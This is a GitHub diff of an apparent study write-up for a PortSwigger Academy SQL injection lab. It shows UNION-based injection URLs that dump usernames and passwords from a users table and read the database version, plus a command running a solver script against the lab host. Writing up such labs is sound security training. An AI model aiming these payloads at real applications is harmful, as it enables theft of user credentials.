File tree 2 files changed +5
-2
lines changed
port_swigger_academy/sqli/sqli_lab_06
2 files changed +5
-2
lines changed Original file line number Diff line number Diff line change @@ -36,11 +36,14 @@ analysis:
36
36
![ 1] ( screenshot/1.png )
37
37
38
38
- In this case, we need to retrieve all usernames and passwords from the database. here below the following command to retrive all username & password
39
- ` https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, username || ':' || password FROM users-- `
39
+ ` https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, username || ':' || password FROM users-- `
40
+
41
+ ![ 2] ( screenshot/2.png )
42
+
40
43
- we can retrieve the database version from this lab
41
44
` https://ac571f8b1e65b8e6c0b80f5e00f400a1.web-security-academy.net/filter?category=Accessories' UNION select NULL, version()-- `
42
45
43
- ![ 2 ] ( screenshot/2 .png )
46
+ ![ 3 ] ( screenshot/3 .png )
44
47
45
48
``` bash
46
49
$ python3 sqli_lab_06.py " https://acb91fb01e4afc7dc0d4991700de003a.web-security-academy.net"
You can’t perform that action at this time.
0 commit comments